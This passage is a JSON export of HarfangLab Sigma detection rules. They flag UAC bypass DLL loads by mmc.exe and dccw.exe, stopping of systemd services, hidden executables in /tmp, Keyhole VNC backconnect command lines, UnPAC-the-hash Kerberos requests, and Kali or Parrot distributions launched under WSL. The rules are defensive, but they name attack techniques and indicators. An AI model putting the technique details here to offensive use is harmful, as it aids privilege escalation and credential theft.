"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.092372Z",
"creation_date": "2026-03-23T11:45:34.092374Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.092378Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME",
"https://attack.mitre.org/techniques/T1548/002/"
],
"name": "t1548_002_uac_bypass_mmc_atl_mmcex.yml",
"content": "title: DLL Related to UAC Bypass Loaded by mmc.exe\nid: 6b391800-cce0-4884-8edc-4be9d0b7daae\ndescription: |\n Detects a suspicious DLL being loaded by mmc.exe.\n Adversaries may abuse a COM object's auto-elevation mechanism to write a DLL in an arbitrary path and then execute mmc.exe to execute arbitrary code with elevated privileges for UAC bypass.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of mmc.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://github.com/hfiref0x/UACME\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2024/10/08\nmodified: 2025/02/06\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection_process:\n ProcessOriginalFileName: 'mmc.exe'\n\n selection_variant_1:\n ProcessCommandLine|contains: 'WmiMgmt.msc'\n ImageLoaded|endswith: '\\ATL.DLL'\n Signed: 'false'\n\n selection_variant_2:\n ImageLoaded|endswith: '\\MMCEx.ni.dll'\n Signed: 'false'\n\n exclusion_mmcex_microsoft:\n ImageLoaded|endswith: '?:\\Windows\\assembly\\NativeImages_*_??\\MMCEx\\\\*\\MMCEx.ni.dll'\n Company: 'Microsoft Corporation'\n Description: 'MMCEx'\n\n condition: selection_process and 1 of selection_variant_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b391800-cce0-4884-8edc-4be9d0b7daae",
"rule_name": "DLL Related to UAC Bypass Loaded by mmc.exe",
"rule_description": "Detects a suspicious DLL being loaded by mmc.exe.\nAdversaries may abuse a COM object's auto-elevation mechanism to write a DLL in an arbitrary path and then execute mmc.exe to execute arbitrary code with elevated privileges for UAC bypass.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of mmc.exe and to identify the process responsible for the DLL file creation.\n",
"rule_creation_date": "2024-10-08",
"rule_modified_date": "2025-02-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b4a72fc-da92-4c5d-af69-3f604fd5dd03",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089770Z",
"creation_date": "2026-03-23T11:45:34.089772Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089776Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1489/",
"https://attack.mitre.org/techniques/T1569/",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1489_systemd_service_stop.yml",
"content": "title: Suspicious SystemD Service Stopped\nid: 6b4a72fc-da92-4c5d-af69-3f604fd5dd03\ndescription: |\n Detects a sensitive SystemD service being manually from stopped using the systemd binary.\n Adversaries may stop services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\n It is recommended to analyze the behavior of the user performing this action around the alert to look for malicious content or actions.\nreferences:\n - https://attack.mitre.org/techniques/T1489/\n - https://attack.mitre.org/techniques/T1569/\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2023/12/15\nmodified: 2025/01/09\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1489\n - attack.execution\n - attack.t1569\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.SystemModification\n - classification.Linux.Behavior.ServiceStop\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_systemctl:\n Image|endswith: '/systemctl'\n CommandLine|contains:\n - ' kill '\n - ' stop '\n\n selection_service:\n CommandLine|contains:\n - ' mysql'\n - ' ssh'\n - ' cron'\n - ' libvirtd'\n\n # Package Managers\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - '/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n exclusion_snapd:\n ProcessParentImage: '/snap/snapd/*/usr/lib/snapd/snapd'\n exclusion_apk:\n ProcessImage:\n - '/sbin/apk'\n - '/usr/sbin/apk'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_parent_commandline:\n ProcessParentCommandLine:\n - '/bin/sh /usr/sbin/invoke-rc.d * stop'\n - 'bash -c . /opt/wab/share/common/service-management.bash; relax_system'\n - '/bin/bash /usr/local/bin/backup_mysql_bi'\n - '/usr/bin/monit -c /etc/monit/monitrc'\n - '/usr/bin/python /home/*/.ansible/tmp/ansible-tmp-*/ansiballz_*.py'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b4a72fc-da92-4c5d-af69-3f604fd5dd03",
"rule_name": "Suspicious SystemD Service Stopped",
"rule_description": "Detects a sensitive SystemD service being manually from stopped using the systemd binary.\nAdversaries may stop services on a system to render those services unavailable to legitimate users or to impair the security tools already installed.\nIt is recommended to analyze the behavior of the user performing this action around the alert to look for malicious content or actions.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2025-01-09",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution",
"attack.impact"
],
"rule_technique_tags": [
"attack.t1489",
"attack.t1562.001",
"attack.t1569"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b59f2b7-766d-4f2f-9527-e99d9058eb37",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.077738Z",
"creation_date": "2026-03-23T11:45:34.077740Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.077745Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/L3cr0f/DccwBypassUAC"
],
"name": "uac_bypass_dccw.yml",
"content": "title: UAC Bypass Executed via dccw.exe\nid: 6b59f2b7-766d-4f2f-9527-e99d9058eb37\ndescription: |\n Detects the dccw.exe process loading an unsigned GdiPlus.dll.\n This may be indicative of an UAC bypass.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the loaded DLL and user session responsible to look for malicious content or actions.\nreferences:\n - https://github.com/L3cr0f/DccwBypassUAC\ndate: 2020/10/14\nmodified: 2025/04/10\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image|endswith: 'Windows\\System32\\dccw.exe'\n ImageLoaded: '*\\Windows\\System32\\dccw.exe.local\\\\*\\GdiPlus.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n - 'Microsoft Windows Publisher'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b59f2b7-766d-4f2f-9527-e99d9058eb37",
"rule_name": "UAC Bypass Executed via dccw.exe",
"rule_description": "Detects the dccw.exe process loading an unsigned GdiPlus.dll.\nThis may be indicative of an UAC bypass.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the loaded DLL and user session responsible to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-14",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b6a4571-da9f-4a59-95d2-54764f10e54d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089678Z",
"creation_date": "2026-03-23T11:45:34.089680Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089685Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md",
"https://attack.mitre.org/techniques/T1564/001/"
],
"name": "t1564_001_hidden_temporary_path_file_execution.yml",
"content": "title: Hidden File Execution from Temporary Paths\nid: 6b6a4571-da9f-4a59-95d2-54764f10e54d\ndescription: |\n Detects the execution of a file that is hidden or in a hidden directory from a temporary folder.\n This could be used by an attacker to try and evade detection and hide their traces, as temporary folders are cleaned on reboot.\n It is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md\n - https://attack.mitre.org/techniques/T1564/001/\ndate: 2021/10/11\nmodified: 2025/02/12\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.execution\n - attack.t1564.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|startswith:\n - '/tmp/.'\n - '/var/tmp/.'\n - '/tmp/*/.'\n - '/var/tmp/*/.'\n\n # Systemd mounts some appimages and other similar binary-as-devices in `/tmp/.mount_xxxxx/`.\n filter_tmp_mounts:\n Image|startswith:\n - '/tmp/.mount_*/'\n - '/var/tmp/.mount_*/'\n\n exclusion_oracle:\n Image: '/tmp/RU_Oracle/gateways/install/.oui'\n\n exclusion_java:\n ParentImage|endswith: '/jre/bin/java'\n\n exclusion_heroku:\n Image|endswith: '/tmp/build/.heroku/node/bin/node'\n\n exclusion_dropbox:\n Image: '/tmp/.dropbox-*/.dropbox-dist/dropbox-*/dropbox'\n\n exclusion_node:\n ParentImage: '/usr/local/bin/node'\n\n exclusion_maturin:\n Image|endswith: '/bin/maturin'\n CommandLine|contains: 'build-wheel'\n\n exclusion_terraform:\n Image|startswith:\n - '/tmp/tmp.*/.terraform/providers/registry.terraform.io/'\n - '/tmp/provider.tf??????????/.terraform/providers/registry.terraform.io'\n - '/tmp/tf/.terraform/providers/registry.'\n - '/tmp/dev-platform-deploy/terragrunt/'\n\n exclusion_pip_meson:\n Image:\n - '/tmp/pip-install-????????/*/.mesonpy-????????/meson-private/sanitycheckc.exe'\n - '/tmp/pip-install-????????/*/.mesonpy-????????/meson-private/sanitycheckcpp.exe'\n\n exclusion_constgen:\n Image: '/tmp/.const_generator????????-???????-??????.bin'\n\n exclusion_vmware:\n Image: '/tmp/.vmware-sysinfo-????????????????/vmware-sysinfo'\n\n exclusion_sap:\n Image: '/tmp/.SAPOSCOL_*_*.EXE'\n ParentImage: '/usr/sap/hostctrl/exe/saposcol'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b6a4571-da9f-4a59-95d2-54764f10e54d",
"rule_name": "Hidden File Execution from Temporary Paths",
"rule_description": "Detects the execution of a file that is hidden or in a hidden directory from a temporary folder.\nThis could be used by an attacker to try and evade detection and hide their traces, as temporary folders are cleaned on reboot.\nIt is recommended to analyze the parent process for suspicious activities and to determine if the executed binary is legitimate.\n",
"rule_creation_date": "2021-10-11",
"rule_modified_date": "2025-02-12",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1564.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b8fcfbc-7430-4b29-b1bb-4e65bee98aec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079042Z",
"creation_date": "2026-03-23T11:45:34.079044Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079048Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03",
"https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole",
"https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/",
"https://www.trendmicro.com/fr_fr/research/25/b/black-basta-cactus-ransomware-backconnect.html",
"https://attack.mitre.org/techniques/T1021/005/"
],
"name": "t1021_005_keyhole_vnc_command_executed.yml",
"content": "title: Keyhole VNC Command Executed\nid: 6b8fcfbc-7430-4b29-b1bb-4e65bee98aec\ndescription: |\n Detects commands executed through the Keyhole VNC module, also named BackConnect module.\n Keyhole is a multi-functional backconnect component use to establish and maintain persistent control over compromised systems.\n This module is especially used by ransomware group and is related to trojan like IcedID, Qakbot, TrickBot and Latrodectus.\n It is recommended to check for injected threads and to review network connexion into the grandparent process, as well as to investigate the command executed.\nreferences:\n - https://medium.com/walmartglobaltech/keyhole-analysis-60302922aa03\n - https://malpedia.caad.fkie.fraunhofer.de/details/win.keyhole\n - https://blog.nviso.eu/2023/03/20/icedids-vnc-backdoors-dark-cat-anubis-keyhole/\n - https://www.trendmicro.com/fr_fr/research/25/b/black-basta-cactus-ransomware-backconnect.html\n - https://attack.mitre.org/techniques/T1021/005/\ndate: 2025/07/09\nmodified: 2025/08/05\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.005\n - attack.execution\n - attack.t1059.001\n - attack.t1059.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Keyhole\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine:\n - 'cmd.exe /K chcp 65001 && c: && cd c:\\'\n - 'powershell.exe -c \"[Console]::OutputEncoding = [Console]::InputEncoding = [System.Text.Encoding]::GetEncoding(?utf-8?); cd c:\\; powershell\"'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b8fcfbc-7430-4b29-b1bb-4e65bee98aec",
"rule_name": "Keyhole VNC Command Executed",
"rule_description": "Detects commands executed through the Keyhole VNC module, also named BackConnect module.\nKeyhole is a multi-functional backconnect component use to establish and maintain persistent control over compromised systems.\nThis module is especially used by ransomware group and is related to trojan like IcedID, Qakbot, TrickBot and Latrodectus.\nIt is recommended to check for injected threads and to review network connexion into the grandparent process, as well as to investigate the command executed.\n",
"rule_creation_date": "2025-07-09",
"rule_modified_date": "2025-08-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.005",
"attack.t1059.001",
"attack.t1059.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ba77b38-d3e5-4842-ae46-fde9082b97af",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086333Z",
"creation_date": "2026-03-23T11:45:34.086335Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086339Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce",
"https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash",
"https://attack.mitre.org/techniques/T1649/"
],
"name": "t1649_unpac_the_hash.yml",
"content": "title: UnPAC the Hash\nid: 6ba77b38-d3e5-4842-ae46-fde9082b97af\ndescription: |\n Detects suspicous service ticket request with the `ENC-TKT-IN-SKEY` flag option linked to the UnPAC-the-hash attack.\n UnPAC-the-hash lets an attacker with a valid Kerberos TGT — and the ability to sign tickets as the user (e.g., via the user’s private key, Shadow Credentials, or a Golden Certificate) — extract that user’s NTLM (and legacy LM) password hashes.\n By abusing PAC validation and forged tickets, the technique converts Kerberos authentication material into reusable NTLM hashes for lateral movement and pass-the-hash attacks.\n The result is credential theft that can enable persistent and high-privilege domain compromise.\n It is recommended to pivot to the source IP for suspicious activities.\nreferences:\n - https://medium.com/falconforce/falconfriday-detecting-unpacing-and-shadowed-credentials-0xff1e-2246934247ce\n - https://www.thehacker.recipes/ad/movement/kerberos/unpac-the-hash\n - https://attack.mitre.org/techniques/T1649/\ndate: 2024/11/08\nmodified: 2025/11/04\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1649\n - classification.Windows.Source.EventLog\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n service: security\ndetection:\n selection:\n EventID: 4769\n TicketOptions:\n - '0x40810018' # Certipy --> Forwardable | Renewable | Canonicalize | Enc_tkt_in_skey | Renewable_ok\n - '0x40800018' # Kekeo --> Forwardable | Renewable | Enc_tkt_in_skey | Renewable_ok\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ba77b38-d3e5-4842-ae46-fde9082b97af",
"rule_name": "UnPAC the Hash",
"rule_description": "Detects suspicous service ticket request with the `ENC-TKT-IN-SKEY` flag option linked to the UnPAC-the-hash attack.\nUnPAC-the-hash lets an attacker with a valid Kerberos TGT — and the ability to sign tickets as the user (e.g., via the user’s private key, Shadow Credentials, or a Golden Certificate) — extract that user’s NTLM (and legacy LM) password hashes.\nBy abusing PAC validation and forged tickets, the technique converts Kerberos authentication material into reusable NTLM hashes for lateral movement and pass-the-hash attacks.\nThe result is credential theft that can enable persistent and high-privilege domain compromise.\nIt is recommended to pivot to the source IP for suspicious activities.\n",
"rule_creation_date": "2024-11-08",
"rule_modified_date": "2025-11-04",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1649"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6bab01c3-5165-4dfd-a77a-42077f50025a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.297227Z",
"creation_date": "2026-03-23T11:45:35.297229Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.297233Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.kali.org/docs/wsl/",
"https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1",
"https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux",
"https://attack.mitre.org/techniques/T1202/"
],
"name": "t1202_wsl_hacking_distribution_execution.yml",
"content": "title: Hacking Distribution Executed Under WSL\nid: 6bab01c3-5165-4dfd-a77a-42077f50025a\ndescription: |\n Detects the execution of various Linux hacking distributions through WSL (Windows Subsystem For Linux).\n Popular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\n Threat actors may abuse WSL to evade Windows security controls and execute malicious code.\n It is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\nreferences:\n - https://www.kali.org/docs/wsl/\n - https://blog.qualys.com/vulnerabilities-threat-research/2022/03/22/implications-of-windows-subsystem-for-linux-for-adversaries-defenders-part-1\n - https://en.wikipedia.org/wiki/Windows_Subsystem_for_Linux\n - https://attack.mitre.org/techniques/T1202/\ndate: 2026/03/03\nmodified: 2026/03/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1202\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection_process:\n ProcessImage:\n - '?:\\Program Files\\WindowsApps\\KaliLinux*\\kali.exe'\n - '?:\\Program Files\\WindowsApps\\\\*Voza.AthenaOS*\\athena.exe'\n ProcessParentImage: '?:\\Program Files\\WSL\\wsl.exe'\n\n selection_commandline:\n ProcessImage: '?:\\Program Files\\WSL\\wsl.exe'\n ProcessCommandLine|contains:\n - '-d kali-linux'\n - '-d Athena'\n - '-d ParrotOS'\n\n condition: 1 of selection_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6bab01c3-5165-4dfd-a77a-42077f50025a",
"rule_name": "Hacking Distribution Executed Under WSL",
"rule_description": "Detects the execution of various Linux hacking distributions through WSL (Windows Subsystem For Linux).\nPopular hacking distributions provide pre-installed penetration testing and security assessment tools that could be leveraged for malicious purposes.\nThreat actors may abuse WSL to evade Windows security controls and execute malicious code.\nIt is recommended to monitor process trees and subsequent WSL activities for signs of malicious behavior.\n",
"rule_creation_date": "2026-03-03",
"rule_modified_date": "2026-03-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1202"
],
"warnings": null,
"errors": null,
"declared_in": null,
